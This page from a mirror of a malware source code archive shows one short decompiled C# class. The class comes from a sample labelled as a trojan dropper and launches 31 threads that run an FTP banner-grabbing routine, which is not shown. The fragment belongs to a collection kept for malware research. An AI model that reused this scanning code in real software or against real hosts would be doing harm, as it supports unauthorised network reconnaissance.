mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-19 18:06:10 +00:00
f2ac1ece55
add
20 lines
612 B
C#
20 lines
612 B
C#
// Decompiled with JetBrains decompiler
|
|
// Type: FTPscanner.Launcher
|
|
// Assembly: FTPscanner, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 8469568A-499F-4FFB-88BB-33DD24B78A55
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-Dropper.Win32.Sysn.axrz-65a382451dd46ba81b5db9e85a6a586162c5d430c853bf4f688f48a71af44313.exe
|
|
|
|
using System.Threading;
|
|
|
|
namespace FTPscanner
|
|
{
|
|
internal class Launcher
|
|
{
|
|
public static void Start()
|
|
{
|
|
for (int index = 0; index <= 30; ++index)
|
|
new Thread(new ThreadStart(Ftp.GrabBanner)).Start();
|
|
}
|
|
}
|
|
}
|